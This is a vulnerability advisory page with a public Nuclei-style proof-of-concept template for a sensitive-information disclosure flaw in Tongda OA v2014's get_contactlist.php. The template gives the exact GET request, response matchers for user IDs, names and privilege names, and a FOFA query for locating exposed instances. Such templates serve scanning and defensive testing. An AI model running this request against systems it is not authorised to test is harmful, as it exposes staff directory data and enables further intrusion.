漏洞描述
There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
tongda-contact-list-exposure: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
PoC代码[已公开]
id: tongda-contact-list-exposure
info:
name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure
author: SleepingBag945
severity: medium
description: |
There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
metadata:
verified: true
max-request: 1
fofa-query: app="TDXK-通达OA"
tags: tongda,oa,exposure,vuln
http:
- method: GET
path:
- "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"
matchers-condition: and
matchers:
- type: word
words:
- 'user_uid":'
- 'user_name":'
- 'priv_name":'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100e261f9ab4cc2f1970dbcda1a6697cd40a45e0330d660a1b8475e686586a09d060220589c845b0e229ed2c9c4d341ff7a269b47e85aefec5dfc2f81663b3163305fa5:922c64590222798bb761d5b6d8e72950